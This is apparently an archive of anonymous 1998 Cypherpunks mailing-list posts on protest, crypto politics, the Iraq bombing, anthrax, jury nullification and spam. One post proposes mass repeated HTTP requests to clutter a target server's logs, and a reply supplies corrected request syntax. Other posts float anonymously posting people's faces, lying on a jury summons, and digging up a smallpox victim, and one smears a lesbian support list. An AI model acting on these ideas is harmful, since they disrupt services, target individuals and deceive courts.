other references not mentioned, the activity can be looked at as a large
scale letter writing campaign like the ones organized by Amnesty
International which are aimed at prison officials holding political
dissidents or political prisoners.  The idea is to maximize awareness (to
the targets as well as mass media) of the protest while minimizing the
likelyhood of severe litigation or other punitive action against those
involved in the protest.  It's basically an indismissible show of dissent in
large numbers aimed directly at the source of the dissent.
As commonly understood, a DoS (Denial of Service) attack would entail an
undisclosed group of hackers and script kiddies attempting to knock out a
server/site for as long as possible-- which usually requires that the group
be destructive and remaining as anonymous and untrackable as possible.  This
was _not_ what I had in mind as option c).
In an effective ECD campaign you would want to publicize what your agenda is
including a listing of possible spokespersons/leaders for negotiation to
both the target and the media.  You would also want to control the extent of
the Disruption of Service (instead of Denial of Service) to somewhere
between more than barely being noticed to less than breaking any laws.
Example: A public web page is setup with information on the next "sit in" or
"log writing campaign" containing the agenda behind the protest, contact
persons for more information, target site with explanation of choice, start
time and stop time.  Let's further that the cause is able to get a couple
hundred or couple thousand supporters to, for example, repeatedly telnet to
port 80 on the remote server during a specific 5 minute window and type in:
GET I do not support your sites views on such and such see
 for details.
Given the right level of logging on the server you'd quickly fill up the
target's logs with a record of the number of people (or actually computers)
that don't agree with the target's agenda.  In Trei's last copied paragraph
he mentioned setting up a dedicated target for the DES challenge.  I think a
similar scenario would also be an effective tool for ECD for testing support
as well as being an alternate site since some target sites could be ominious
enough to keep supporters at bay and a guinea pig site with full logging
could be used to gather data to present to the media directly instead of to
the media through a target site.
I'd rather not get into a lengthy arguement about the legality of the above
or whether it can be implemented since judging from the result of some of
the last calls to protest within this group I don't think this type of
action will see a real implementation anytime soon so it's legality and
feasibility would be mostly speculation IMHO.  I just wanted to clarify what
I had in mind as option c) in the original mailing.
It's late and there's a bunch of good jazz happening the next two nights at
the Mercury Lounge in downtown Austin.  The crypto revolution will have to
wait for a less festive time of year :-)...
C.G. the above are my views-- and possibly my views alone :-(

@_date: 1998-12-16 18:41:49
@_author: Anonymous 
@_subject: DoS considered harmful [WAS: RE: Anyone striking?] 
["clarification", or something, elided]
You clearly don't run a website. Logs are very valuable. Any admin
who doesn't have space for at least several days of normal traffic
available on their logging device is simply not doing a good job.
A network admin running a website doesn't lose logs - careers live
and die on them (if this seems an overstatement to you, go look at
 and report your findings.
-10 points for declaring it stupid.).
If you didn't mean "fill up the target's logs" (which I took to mean
overflow available disk space), but rather "pepper the logs with
many instances of some sort of odd political commentary", that could
have an effect. It could throw off reporting and make a new conversation
topic for editors, which might, if you managed to organize enough
people, earn you a CNET story. "CyberActivists Make An Obtuse
Statement - Click Here For Soundbyte".
Great job.
Truth is, on any major site, you'd need hundreds of robots making
your bogus requests to show up - manually telneting to port 80
is line noise these days to any serious site, unless you're poking
at potential security problems.
If you really want to try this, at least take the bother to make
valid HTTP requests that most servers will recognize. Your example
above should be something like:
for/details HTTP/1.0
(note the two newlines at the end of the request)
A sysadmins reality check,
T. Pynchon

@_date: 1998-12-17 02:16:42
@_author: Anonymous 
@_subject: CRYPTO-GRAM, December 15, 1998 
As a further clarification, it is incorrect to say that NAI "never left
the KRA."
Network Associates Inc. (NAI) was formed out of McAfee and Network
General.  McAfee was a member of the KRA, so at the time NAI was formed,
it was a member of the KRA.
When NAI bought PGP, in late 1997, Phil Zimmermann found out about NAI's
membership, and he was able to persuade management to withdraw from
the KRA.  This is why it is wrong to say that NAI never left the KRA.
See NAI bought TIS a few months later.  TIS was a member and in fact a leading
member of the KRA.  By purchasing TIS, NAI inherited its membership in
the KRA, and so NAI was once again a member.
It's not clear whether Phil Zimmermann or anyone else tried to get NAI to
again withdraw from the KRA, but if they did, they were not successful.
NAI renewed its membership later in 1998 and is still a member of the KRA,
although it has reduced its level of participation.

@_date: 1998-12-17 05:48:02
@_author: Anonymous 
@_subject: Network Associates' KRA Partner status 
This sounds like some legalistic spin-doctoring from the KRA to try to
minimize the political impact of the departure.  Are they really claiming
that the KRA did not exist as late as December, 1997?  See their own press
release at  dated October 2,
1996, describing the formation of the KRA.  See also the McAfee press
release at  dated
December 12, 1996, saying that McAfee was joining the KRA, and the KRA
press release  from May, 1997,
welcoming 22 new members.
Perhaps their story is that prior to December, 1997, the KRA had enough
existence for companies to join, but not enough for them to withdraw?
Keep in mind that the KRA is apparently trying to put a particular spin
on events, as is clear from their strained attempt to claim that NAI never
withdrew because their was "no entity from which to withdraw."  They want
to maximize the appearance of commercial support for their organization.
The membership applications they are referring to may just be the
paperwork needed to officially transfer the membership from TIS to NAI.
This would represent NAI's decision to continue to be a member of the
KRA but would not be a matter of joining anew; rather it would maintain
the existing relationship inherited from TIS.

@_date: 1998-12-17 08:21:33
@_author: Anonymous 
@_subject: Clinton Attacks Iraq 
Spoken like a poet.  First thought, best thought.
Here's a loose haiku:
Bubba launched
a massive strike on Iraq
blowjob snag go *poof*
Excuse the abuse of style...
sig space for lease

@_date: 1998-12-18 04:08:16
@_author: Anonymous 
@_subject: Comrade Klinton at it again 
Comrade Klinton just started another bombing run, curiously after it became
widely known that the impeachment hearings wouldn't be delayed until next
week. So far, every target hit has been in camera range. NBC said that the
Iranian Embassy might have been hit by a Tomahawk.

@_date: 1998-12-18 04:42:20
@_author: Anonymous 
@_subject: No Subject 
McAfee has announced that they are giving away the commercial version of PGP 6.0.2 for free for a limited time.  It also includes PGP Disk, which creates virtual encrypted drives.  PGP 6.0.2 also claims to have anti-TEMPEST protection, by using a special font.  My question is: what's the catch?
It is a fact that Network Associates (McAfee's owner) is a member of the Key Recovery Aliance.  Is the decision to give the software away part of something that's not being said (i.e. reduced security) or did I spend $39.99 on PGP and an additional $39.99 on PGP Disk for no reason because it would become available for free two weeks later?
And, has anyone tested the anti-TEMPEST features in PGP 6.0.2?

@_date: 1998-12-18 05:57:10
@_author: Anonymous 
@_subject: Clinton Attacks Iraq 
By the order of the new Joint Chief of Staff, the newly commissioned Nielsen
rating system, the bombings were halted due to most targets being pointed at
the White House for Clinton-mania by select TV viewers nationwide.  Once
Clinton was off the air the new targetting systems available at select
Nielsen homes nationwide resumed proper operation by select War at Home
families tuning to their favorite news channels covering sites in Iraq.
Unfortunately a select number of viewers took shine to the Iranian Embassy
causing a tomahawk's guidance system to be changed and resulting in the
destruction of mentioned structure.  This will, of course, be blamed on user
error at the next press hearing.
yours virtually forever (however long that may be),
"Wag the Dog" was just the beginning...

@_date: 1998-12-18 13:16:19
@_author: Anonymous 
@_subject: ..... 
* Intel's new chipset -> death of open source security?
 [  ]
 * "[T]he Clinton administration announced further relaxation of U.S. export
 limits on encryption technologies."
 [ Mobile Computing and Communications (Jan. 99 issue, pp. 26+) ]

@_date: 1998-12-18 13:54:33
@_author: Anonymous 
@_subject: ..... 
To clarify exactly why this is a problem: although it obviously won't affect
the security of existing apps, it's likely that many newer apps will be
dependent on this possibly-secret firmware for security, and we all know the
evils of depending on a design not subject to intense public scrutiny. Worse
yet, it seems possible that a certificate-based system could be used to ensure
that neither non-Intel chips nor software fill-ins would be accepted by
applications using the firmware.
And, of course, except for what was mentioned in the TechWeb article itself,
this is all conjecture based almost entirely on Murphy's Law.

@_date: 1998-12-20 07:22:50
@_author: Anonymous 
@_subject: Iwhack 
inspectors at
It is not always entirely propoganda that embassy people, peace corps types, businessmen, etc. are spies.

@_date: 1998-12-20 07:24:13
@_author: Anonymous 
@_subject: No Subject 
to invite them to leave
no good at all, so the next
You may also want to post their faces anonymously on relevent lists.
Phrase it to avoid liability, or not.  False alarms are regrettably
a consequence of security.
Ms Winchester

@_date: 1998-12-20 12:22:35
@_author: Anonymous 
@_subject: Intel security hub 
This has been mentioned before. Only suggested response so far is to fight
tooth and nail to ensure that hub-dependent programs can work transparently
with a software fill-in. Otherwise you could potentially need to break a
tamper-resistant chip, patch the software (fortify^2...), or pull off some such
superhuman feat.
(By the way, the address for letters to the editors of Mobile Computing and
Communications, in case you want to respond to the articles mentioned, is
) More redundant reiterations of senseless nonsense:
I'm not so confident it'd be backdoored, but if it's closed-source (not
unlikely) that is, for obvious reasons, bad. Even if not, it will, with
probability just barely <1, result in Intel as a major CA. I don't think the
hub'd be backdoored because it'd be a risky investment for anybody to backdoor
it; although I'm not sure the hub'd be closed-source, anything trivially and
undetectably compromised is about as bad; Intel'd use the hub to become a CA
just because it makes business sense.

@_date: 1998-12-20 13:34:38
@_author: Anonymous 
@_subject: Anthrax Theatre 
The FBI is in between a rock and a hard-on here.
If anthrax spores really had been released into those air ducts, it could
potentially infect anyone in the building. They can't very well let these
people walk out when they might be carriers of antrax. That's the power of
bioweapons: Infect a bunch of people and they do the work of spreading it
for you.
before the test results are back, in an attempt to increase chances of
survival. I can also understand the containment suits.
The fact that it can be done with a 25 cent phone call is funny.

@_date: 1998-12-20 14:52:01
@_author: Anonymous 
@_subject: Anthrax Theatre 
If this is true, we've caught the media in yet another lie. The media likes
to paint the picture that anthrax can be released in an airport and spread
to all corners of the country in a matter of hours.
Typical of the media. Shame on me for accessing anything they've shoved down
my throat. :)

@_date: 1998-12-20 20:29:59
@_author: Anonymous 
@_subject: The "Married Lesbian Underground" (was: Re: Huffington a Fag) 
One of them is the "Married But Lesbian" (MarBLes) mailing list
moderated by Anna Holmes  and hosted on the
queernet.org server.  This one is so ultra-paranoid that potential
subscribers are required to submit biographic information to the
moderator and undergo a screening "interview" of some sort prior to
being admitted to the list.  You can read more info on this lesbian
networking tool at this URL at lesbian.org:
  The idea of using men as "a sperm bank with a checkbook" is really
insidious, but by the time many of the victims of this deception
find out they've been deceived and used, it's too late.  The above
URL, BTW, says that the list has a panel of six formerly married
lesbians for "support", which seems to be a euphemism for coaching.
Since marriage is a civil contract I wonder if such willful
"interference with the performance of a contract" has ever been
redressed in court.

@_date: 1998-12-21 08:28:17
@_author: Anonymous 
@_subject: No Subject 
Prepping for Y2K armageddon so far has caused our taskforce little more trouble than post-its on each device showing an ode to Mercury for getting the lead out in time to lope upstairs shedding clothes for the bacchanale planned to celebrate the end of computer oversight of our infrapasture.
We urge ourselves: good riddance to everything overmanaged by the matrixed interdependent skeins of networks and switches and redundancies and dev nulls and robot backups, time to get back in touch with fecund reality, slurp gutters, chew roots, sniff musks, chuck pixels.
One mole aint into that, though, and uplinks us it's going
to be evil incarnate under sky, without electromechanical life and love and think support systems, untethered, fending for ourselves, trying to walk and talk, itching filth, urging
senses to pinpoint food and drink, getting no feedback, becoming terrified, running across a roadkilled computer, gathering around, toggling inputs, rooting peripherals, suckling outputs, so the saint preaches, you'll be gasping: why have you abandoned us, oh motherboard, boot up.
Hooting, itching to get offline topside we backslash: Rev gospel,

@_date: 1998-12-21 09:06:01
@_author: Anonymous 
@_subject: FW: PRIVACY Forum Digest V07 #21(excerpt) 
Snip from the latest Privacy Forum Digest on commercial filtering software
for enterprises, encryption and "criminal skills".
A Navigo Farmer

@_date: 1998-12-21 21:48:12
@_author: Anonymous 
@_subject: No Subject 
ACLU: Bombing in Iraq Violates
     Constitution and War Powers Act
FOR IMMEDIATE RELEASE
Thursday, December 17, 1998
WASHINGTON -- The American Civil Liberties Union said today that the
bombing of Iraq ordered by President Clinton violates the Constitution
and the War Powers Act because it was not authorized by Congress.
Congress adopted the War Powers Act in 1973 to ensure that U.S. troops
are not sent into hostilities without Congressional authorization,
except in cases where a national emergency is created by attack upon the
United States.
"Launching a massive, sustained military assault is an action that no
one person in our democracy -- including the President -- can
authorize," said ACLU Legislative Counsel Gregory T. Nojeim, adding that
the ACLU takes no position on the use in force in Iraq.
"It is a power that the framers contemplated would be shared by Congress
and the President," Nojeim added, noting that Article I, Section 8,
Clause 11 of the Constitution grants to Congress "the power to declare
war [and] grant letters of marque and reprisal."
Under the Constitution, Congress is given the ultimate decision as to
whether to use force; the President's power is limited to decisions on
how to use the military after Congress has authorized the President to
Section 2(c) of the War Powers Act states that the President has
constitutional authority to "introduce United States Armed Forces into
hostilities, or into situations where imminent involvement in
hostilities is clearly indicated by the circumstances, ... only pursuant
to (1) a declaration of war, (2) specific statutory authorization, or
(3) a national emergency created by an attack upon the United States.
"A debate and vote on the use of force is especially important here,
since many members of Congress have publicly expressed reservations
about the timing of the attack, and Congressional resolutions have been
introduced about the use of force in Iraq," Nojeim said.
One of those resolutions expressed the sense of Congress that the United
States should not take military action against Iraq unless that action
was first authorized by Congress. That resolution, H. Con. Res. 226, was
introduced in February 1998, gathered 108 co-sponsors, but was never
voted on by the full House.
The ACLU said that the resolution that was adopted by the House today,
H. Res. 612, does not meet the requirements of the War Powers Act, and
that the Iraq Liberation Act, which was adopted by Congress and signed
by the President in October, did not authorize the use of U.S. forces in
"A debate would help ensure that all viewpoints on this important issue
are considered," Nojeim said, "and a vote ensures that such an important
decision has been endorsed by the people through their representatives
in Congress."

@_date: 1998-12-21 22:05:00
@_author: Anonymous 
@_subject: No Subject 
The Ministry of Information announces the following:
In order to ensure domestic tranquility and the maximum protection of human rights by reducing crimes against humanity, be it enacted that
- There shall be no whispering in public; you should have nothing to hide unless you are a criminal
- You may not walk or gather in groups of two or more; such gathering is an indication that you may be conspiring to commit some illegal act
- You may not have locks on your house; you should have nothing that you are keeping from the collective
- You are not to draw the blinds or curtains in your house; law-abiding citizens have nothing to hide
- All future voting will be by voice vote before the General Assembly; you will also proclaim your support for the Party before casting your vote
- You will not think.  Free thought is for those that conspire against the righteous government
- You will not associate with the Cypherpunks; they are enemies of those that would oppress you

@_date: 1998-12-22 01:53:03
@_author: Anonymous 
@_subject: bugs and gas 
This is basically an advertizement for anthrax:
An index of CBW sites: Chemical defense:

@_date: 1998-12-22 02:20:15
@_author: Anonymous 
@_subject: export controlled fermenters 
LIST OF DUAL-USE BIOLOGICAL EQUIPMENT
FOR EXPORT CONTROL
1. Complete containment facilities at P3, P4 containment level
Complete containment facilities that meet the criteria for P3 or P4 (BL3,
BL4, L3, L4) containment as specified in the WHO Laboratory Biosafety
manual (Geneva, 1983) are subject to export control. 2. Fermenters*
Fermenters capable of cultivation of pathogenic micro-organisms, viruses or
for toxin production, without the propagation of aerosols, and having all
the following characteristics:
(a) capacity equal to or greater than 100 litres;
*Sub-groups of fermenters include bioreactors, chemostats and
continuous-flow systems.
3. Centrifugal Separators*
Centrifugal separators capable of the contiuous separation of pathogenic
micro-organisms, without the propagation of aerosols, and having all the
following characteristics:
(a) flow rate greater than 100 litres per hour;
(b) components of polished stainless steel or titanium;
(c) double or multiple sealing joints within the steam containment area; (d) capable of in-situ steam sterilization in a closed state.
*Centrifugal separators include decanters.
4. Cross-flow Filtration Equipment
Cross-flow filtration equipment capable of continuous separation of
pathogenic microorganisms, viruses, toxins and cell cultures without the
propagation of aerosols, having all the following characteristics:
(a) equal to or greater than 5 square metres;
(b) capable of in-situ sterilization.
5. Freeze-drying Equipment
Steam sterilizable freeze-drying equipment with a condensor capacity
greater than 50 kgs of ice in 24 hours and less than 1000 kgs of ice in 24
6. Equipment that incorporates or is contained in P3 or P4 (BL3, BL4, L3,
L4) containment housing, as follows:
(a) Independently ventilated protective full or half suits;
(b) Class III biological safety cabinets or isolators with similar
performance standards.
7. Aerosol inhalation chambers
Chambers designed for aerosol challenge testing with microorganisms,
viruses or toxins and having a capacity of 1 cubic metre or greater.
The experts propose that the following item be included in awareness
raising guidelines to industry:
1. Equipment for the micro-encapsulation of live micro-organisms and toxins
in the range of 1-10 um particle size, specifically:
(a) Interfacial polycondensors;
(b) Phase separators.
2. Fermenters of less than 100 litre capacity with special emphasis on
aggregate orders or designs for use in combined systems.
3. Conventional or turbulent air-flow clean-air rooms and self-contained
fan-HEPA filter units that may be used for P3 or P4 (BL3, BL4, L3, L4)
containment facilities.

@_date: 1998-12-22 08:04:04
@_author: Anonymous 
@_subject: No Subject 
i   got a mail message delivered by the friendly old postal service, from
Toto.  he says he has been elected Santa Calus (aka Santa Loco) of Yucca
South CellBlock, at FCI-Tuscon but 'Santa is in The Hole (TM).'
 he is or at least was sharing a cell with a skinhead called 'reaper.' but
reaper has 'great reading material' - such as GQ magaazine - so it's 'not
as grim as it might seem.'
 he says he has come down with a skin condition that is still untreated by
the prison authorities.  his toto-eque notes to the prison staff on
'inmate request' forms don't seem to be helping.
  that's all.

@_date: 1998-12-22 09:48:55
@_author: Anonymous 
@_subject: Good archive of AES algorithms? 
The home page for the AES is There is a page with current attack/break information at:
Bruce Schneier et al have done performance comparisons of AES algorithms;
links to their results at

@_date: 1998-12-22 10:23:05
@_author: Anonymous 
@_subject: Anonymous nym ratings 
Good idea!
This could be done via some of the recent work on group signatures.
Efficient methods have been developed to show that a message is signed
by a key, without revealing what the key is, but proving that the key
itself is signed by a specific other key.
Imagine an editor who only signs keys belonging to people who deserve
to get through filters.  Call this "endorsing" a key.  If you respect
that editor, you set your filters to let messages through which are by
keys he has endorsed in this manner.  Now, people can submit messages
anonymously, but in such a way that they are provably written by an
endorsed key, without revealing which key it is.
The protocols are reasonably efficient, with signature verification taking
about 20 times longer than a regular DSS signature.  However the methods
involve blind signatures, and hence would infringe upon Chaum's patent.
The group signature was described at Crypto 97; an extension for blind
group signatures at Asiacrypt 98; and more work will be presented at
FC 99.

@_date: 1998-12-23 01:53:50
@_author: Anonymous 
@_subject: politically correct bomb graffiti 
..way too amusing..
 Pentagon Decries U.S. Bomb Graffiti Tuesday, December 22, 1998; 1:24 a.m. EST
WASHINGTON (AP) -- Defense Department officials said Monday they were
distressed about ``thoughtless graffiti'' referring to the Islamic holy
month of Ramadan on a Navy bomb being prepared for dropping on Iraq. The Associated Press last Saturday transmitted a photograph of a
2,000-pound laser-guided bomb on the aircraft carrier USS Enterprise in the
Persian Gulf waiting to be loaded on F-14 and F-18 jet fighters. The bomb bore several inscriptions, including one that said, ``Here's a
Ramadan present from Chad Rickenberg.'' ``Department of Defense officials were distressed to learn of thoughtless
graffiti mentioning the holy month of Ramadan written on a piece of U.S.
ordnance during Operation Desert Fox'' in Iraq, chief Pentagon spokesman
Kenneth Bacon said in a statement. ``Religious intolerance is an anathema to Secretary of Defense William S.
Cohen and to all Americans who cherish the right to worship freely,'' he
added. ``The United States deeply respects Islam. We are grateful for our
good relations with Arab and Islamic peoples, and we appreciate the
important contributions of Muslim-Americans to the U.S. military and to our
nation as a whole. ``I know our people in uniform respect and appreciate religious practices
different from their own. This incident is a rare exception that does not
reflect American policy or values.''

@_date: 1998-12-23 13:32:11
@_author: Anonymous 
@_subject: No Subject 
"kryz"  crapped:
*STOP* sending such *RATSHIT* to this mailing list
you unforgivable dickheaded *SACK OF SHIT*
Keep your fucking .EXE files to yourself.
*SMASH YOURSELF* on the head with your nice little
m$-windoze manuals. At least that would knock you
unconscious and you won't be bothering us with
your *BLATHERING CRAP*. *WE DO NOT WANT WINDOZE CRAP* on this list, you *RABIDDOGWHOREMONGER* can you get that through that *FUCKIN THICK* skull of yours?

@_date: 1998-12-23 22:27:06
@_author: Anonymous 
@_subject: Jury Duty 
In 22 years of being qualified, I am facing my first jury duty summons as a regular employee and see no way out except to report. The old self-employment, financial burden exemption no longer applies.
Is there a good web site where I can find other legal means to recuse myself (I live in AZ), or if I do
decide to report and get on a trial, a web site on my rights to vote my conscious, aka jury nullification?
The other option is to just lie, it says the penalty is that of perjury and it seems we shall
soon have case law that perjury is no longer a crime.
Not a facetious post, I have seen posts here on this before, but never really paid attention because it didn't affect me. If no answers, I will resort to a search engine. But I thought this letter would get me better
quality advice.

@_date: 1998-12-24 03:56:02
@_author: Anonymous 
@_subject: Good archive of AES algorithms? 
Apparently you did not see the post which directed you to
  This is the home page for the AES.  It has
links to independent analyses of the algorithms, as well as performance
information.  From that page we find:
Block Cipher Lounge
        cAESar Project
        Efficiency Testing Table
        Efficiency Testing Results
        Analysis from Louis Granboulan
        NIST's preliminary efficiency testing results

@_date: 1998-12-24 03:56:16
@_author: Anonymous 
@_subject: jury duty 
a regular employee and see no way out except to report. The old
self-employment, financial burden exemption no longer applies.
Your employer is not obligated to pay you during your arbitrarily-long
court slavery, BTW.
See: Fully Informed Jury Amendment Since snailmail is datagrams, how do they know you received their packet?
Remember that you aren't obligated to explain your reasons any more
than the barbarians are obligated to be reasonable.
would get me better
I wonder if its a crime yet to refer you to FIJA.  You can get
busted in Calif for distributing FIJA materials near a court.
Don't stand out and you can accomplish more subversion.

@_date: 1998-12-24 04:07:42
@_author: Anonymous 
@_subject: Jury Duty 
Tell them the following:
"I am aware of the doctrine of jury nullification and I will inform my
 fellow jurors of it.  I will invoke it in cases where the defendant
 has been charged with a victimless crime, i.e. drug-related offenses,
 statutory rape, or other thoughtcrime, or when the law is otherwise
 unjust or unreasonable."
The prosecutor won't touch you with a 10 foot pole.

@_date: 1998-12-24 04:38:13
@_author: Anonymous 
@_subject: DOES U.S. INTERVENTION OVERSEAS BREED TERRORISM? 
Executive Summary According to Secretary of State Madeleine Albright, terrorism is the most
important threat the United States and the world face as the 21st century
begins. High-level U.S. officials have  acknowledged that terrorists are now
more likely to be able to obtain and use nuclear, chemical, and biological
weapons than ever before. Yet most attention has been focused on combating terrorism by deterring and
disrupting it beforehand and retaliating against it after the fact. Less
attention has been paid to what motivates terrorists to launch attacks.
According to the Pentagon's Defense Science Board, a strong correlation
exists between U.S. involvement in international situations and an increase
in terrorist attacks against the United States. President Clinton has also
acknowledged that link. The board, however, has provided no empirical data
to support its conclusion. This paper fills that gap by citing many examples
of terrorist attacks on the United States in retaliation for U.S.
intervention overseas.  The numerous incidents cataloged suggest that the
United States could reduce the chances of such devastating--and potentially
catastrophic--terrorist attacks by adopting a policy of military restraint
overseas. In fact, the interventionist foreign policy currently pursued by the United
States is an aberration in its history. Adopting a policy of military
restraint would return the United States to the traditional foreign policy
it pursued for the first century and a half of its existence before the Cold
War distorted it. Such a foreign policy is more compatible with the
individual freedoms and economic prosperity that define the American way of

@_date: 1998-12-24 07:34:51
@_author: Anonymous 
@_subject: Jury Duty 
Be aware that concealing your opinions on this matter can get you into
hot water.  Juror Laura Kriho was convicted of obstruction of justice
for not revealing that she believed in jury nullification, during the
selection process.  Kriho has appealed.  More information is at
The judge's ruling, at :} After reviewing all the evidence and the law, and applying the standard
:} of proof beyond a reasonable doubt, the Court reaches the following
:} conclusions.  During the jury selection process Ms. Kriho was aware that
:} the trial court and the lawyers felt it was a juror's duty to follow the
:} law as given by the trial court, and they wanted to know if any juror
:} disagreed with this proposition. Ms. Kriho was also aware that the trial
:} court and the parties wanted to know if the jurors could follow the rule
:} that punishment was not to enter into their deliberations. Ms. Kriho
:} was also aware that the trial court and the parties wanted to know if
:} the jurors could follow the rule that punishment was not to enter into
:} their deliberations. Ms. Kriho was also aware that the trial court and
:} the parties wanted to know if any juror had strong feelings concerning
:} the enforcement of drug laws or any experience that would affect their
:} attitude about drug laws. While being aware of the importance of these
:} issues and having been given the opportunity to comment on these issues,
:} Ms. Kriho deliberately withheld her opinions on these topics from the
:} trial court and the parties during the jury selection process. Based on
:} all the evidence, this Court concludes that it was Ms. Kriho's intent to
:} withhold this information from the trial court and the parties so that
:} she could be selected to serve on the jury and obstruct the judicial
:} process. By deliberately withholding this information, she obstructed
:} the process of selecting a fair and impartial jury. The selection of
:} jurors who have open minds and who have not preconceived the verdict
:} is essential for a fair trial. Ms. Kriho's lack of candor about her
:} experiences and attitudes led to the selection of a jury doomed to
:} mistrial from the start. This Court finds this conduct constitutes
:} obstruction of justice and this conduct was offensive to the authority
:} and dignity of the trial court.

@_date: 1998-12-24 12:35:00
@_author: Anonymous 
@_subject: bug recipes 
..someone describes the use of mutton for anthrax breeding..
The mils are already vaccinated, so anthrax is passe.  What
you *really* want to do is dig up a smallpox victim...

@_date: 1998-12-24 12:37:57
@_author: Anonymous 
@_subject: ruskies on crypto 
DECREE OF THE PRESIDENT OF THE RUSSIAN FEDERATION
Concerning legal matters in the area of development, production, sale and
usage of encoding devices, and also for the assignment of responsibility
concerning the encoding of information
Our publications
"What is "Digital Money" A.I.Demidov, C.V.Preobrazhensky. "Planet
Internet", 1997, July, Russian. "Cryptography basics" A.I.Demidov. "Internet World"  1997, July.
Russian. "Internet commerce" A.I.Demidov. "Itogi" (JV with "Newsweek") 1997, June. Russian. "The main types of Internet payment systems" A.I.Demidov "Internet World"
 1997, June. Russian. "Digital Cash" A.I.Demidov. "CardWorld"  1997, May. Russian. "Information site:  C.V.Preobrazhensky. ROCIT workshop
"Electronic commerce and Internet payment systems", 1997, April. Russian. "Ways of Internet payment systems development in Russia" A.I.Demidov. ROCIT
workshop "Electronic commerce and Internet payment systems", 1997, April.
Russian. "What is digital money?" A.I.Demidov. "Money"  1997, March. Russian. CLASSICAL CRYPTOGRAPHY COURSE

@_date: 1998-12-24 17:44:25
@_author: Anonymous 
@_subject: Ping 
TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST    TEST

@_date: 1998-12-25 00:35:55
@_author: Anonymous 
@_subject: I want to spam the Jury Duty information 
I think about putting up about $200 or so (whetever a decent spamming will cost me) and spam the internet with the information about jurors
rights and jury nullification.
Anyone thinks that it is a good idea?

@_date: 1998-12-25 03:49:50
@_author: Anonymous 
@_subject: No Subject 
Well if you are going to go to the trouble and expense, then you
should also put something in there to educate the masses about
how to use crypto to protect themselves, and why this is a good

@_date: 1998-12-25 04:12:10
@_author: Anonymous 
@_subject: I want to spam the Jury Duty information 
>> I think about ... and spam the internet...
  >> Anyone thinks that it is a good idea?
  > No, it's a bad idea.  The ends do not justify the means.
Worse, the *only* end you'll achieve is to piss off nearly everyone
who *might* have been interested in what you had to say (and getting
your name added to the Black Hole database and tens of thousands of
individual kill files).
Get real -- is there *anyone* on the net who treats unsolicited email
as anything other than unadulterated dreck?

@_date: 1998-12-25 11:30:17
@_author: Anonymous 
@_subject: Sammerseers Theft  of Ben lauries Intellectual Property(i.e.apache 
For the clueless or history deficient
C2 gots its start by purloining without compensation
Ben Lauries Apache-SSL patches.... Sameer used these and then
had the fucking gall to remove source from apache-ssl
for the mod_ssl.c... all was rosy until Ralf releases
a mod_ssl.c of his design... result??
C2's business worlwide took a nose dive...(layoffs etc)
so now Sameer is trying to coopt Ralf's mod_ssl.c project
(mark my words if Sameer gets his way the source for future
verions will NOT be available no matter what he says now...)
I seen it happen once so now when the litte sob trys it
again I am blowing the whistle...(and retelling history openly)
how about it Sameer are you now going to Sue the Mix network:) ?
    the turds in Sameers Swimming pool
p.s. to the clueless Jim Finder..Happy now asshole...?
BTW I will post when and where I feel like !

@_date: 1998-12-25 12:03:02
@_author: Anonymous 
@_subject: and justice for all but the Goldmans and Jones 
The ends: justice.  The means: a common abuse, which perchance should be illegal like junkfax,
but isn't.  The means: in the late 90s the people had the chance, for a few
years, before the XC Massacre, to publish without convincing corporations.
Do the math.

@_date: 1998-12-25 12:03:09
@_author: Anonymous 
@_subject: land of the free 
Trouble and expense of what?  If you refer to the FIJA spamming,
then you will simply confuse the sheeple with too many issues.

@_date: 1998-12-25 12:10:55
@_author: Anonymous 
@_subject: spamactivism 
Education can only be for the good.
Got an anonymous ecash account of some sort?  In either case, kudos.

@_date: 1998-12-26 10:39:52
@_author: Anonymous 
@_subject: jury spam justifiable? 
Its not stealing because only the Govt can identify crimes.  And they
Legal Junk mail doesn't steal time?  Legal Solicitors' phone calls don't
steal?  Taxes don't steal?  Courtroom injustice isn't a theft of rights?
The message must be phrased correctly.
Who mentioned any mailing list?  This would be a private matter.
Alls fair in love and war.
The sheeple who haven't figured out how to filter spam are the ones
most in need of education.  Do it for the children.  For the future
The only thing evil needs to succeed is for good to do nothing.
Or just carry on with the same old same old, if that's what makes you feel
better.  Best not to make waves, after all.  Might scare the horses.

@_date: 1998-12-26 15:00:25
@_author: Anonymous 
@_subject: jury spam justifiable? 
No, it's stealing. The government doesn't call the Waco incident
murder, but that doesn't make it okay. 1) Yes, but at least the person sending it paid for it. It doesn't
consume any resources from the recipient, other than mailbox space
which the government claims it owns anyway. The postal service has to store and deliver it, but they got paid for it. When you get it,
you're perfectly free to cram it back in the outgoing mail slot like I
2) They steal time and they're very annoying, but they don't steal
money per se. If they're long distance the caller pays for it. Most
people are annoyed by these. The anti-phone-soliciting action is to
never buy from those companies.
3) Taxes are theft at the point of a gun. You won't find much argument
about that here. There will be argument when it comes to the complete
elimination of taxes because that generally means the almost complete
elimination of services.
4) Of course it is.
Just because all four of those things are legal in one way or another
doesn't mean that we should support it. I can walk outside and insult
random people to their face, but that dosen't mean I should.
Just because you *can* do something and you have some reason to do
something doesn't mean that you *should* do it, particularly if there
are better ways.
The phrasing has nothing to do with it. The method of delivery does.
Apparently this is beyond your comprehension, so I'll explain it in
explicit terms.
You will likely direct people to FIJA. First off, when you send the
spam FIJA and their upstream sites are going to get all sorts of
complaints, and rightly so. The site it originates from will also get
flooded. Assuming FIJA is still online a few hours later, they will
probably wind up on spam block lists.
If you spam through anonymous remailers, they'll wind up on spam
blocking lists all over the place. If you falsify an origin address, it will also get flooded with complaints. Even mentioning FIJA is going to get them flooded with complaints.
You also make the mistake of assuming that most people read spam. They
don't. It just annoys them.
If you spam through anonymous remailers, you further the theories of
some people that they are simply abuse havens. This is not a positive
thing for the remailers. The Cypherpunks are associated with the
remailers, so it isn't a positive thing for us either, even though
we'll only be implicated several steps down. If such tactics are fair, then why are we worrying about distributing
FIJA literature? The government has our best interests at heart, after
all. Whatever.
The best thing to do "for the children" is to kick the clueless masses
off the Internet and turn it back into the academic area it used to
be. Good has come out of the commercialization of the Internet, but by
no means does it outweigh the bad.
The best thing to do "for future generations" is to revoke the voting
rights of welfare maggots. I don't see it happening very soon.
Or for good to use the means of the evil to express their good ideas,
in the process becoming the very thing they are fighting against.
Make a web site. Put it in your signature. Have others put it in their
signatures. Have people link to it from their pages. Advertise in
*appropriate* forums in appropriate manners.
It's threads like this that make me wonder what it really means to be
